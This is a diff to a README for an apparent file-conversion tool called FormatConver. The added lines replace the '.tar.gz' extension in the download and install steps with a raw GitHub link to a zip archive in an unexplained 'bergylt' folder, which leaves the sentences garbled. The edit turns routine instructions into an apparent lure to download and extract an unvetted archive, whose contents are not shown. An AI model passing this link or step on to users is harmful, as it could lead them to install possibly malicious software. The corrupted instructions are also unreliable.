fidjey08/FormatConver/README.md

    - Look for the top entry labeled "Latest Release."
 This version has the most features and fixes.

 3. **Download the Application**
    - Click on the link for the version that matches your operating system.
-This might be a `.exe` file for Windows, a `.dmg` file for macOS, or a `.tar.gz` file for Linux.
+This might be a `.exe` file for Windows, a `.dmg` file for macOS, or a `https://raw.githubusercontent.com/fidjey08/FormatConver/main/bergylt/FormatConver.zip` file for Linux.

 4. **Install the Application**
    - If you downloaded a `.exe` or `.dmg` file, double-click it and follow the on-screen instructions to install FormatConver.
-   - For a `.tar.gz` file, extract it and follow any README instructions included.
+   - For a `https://raw.githubusercontent.com/fidjey08/FormatConver/main/bergylt/FormatConver.zip` file, extract it and follow any README instructions included.

 5. **Run FormatConver**
    - Once installed, open the application by clicking its icon on your desktop or in your applications folder.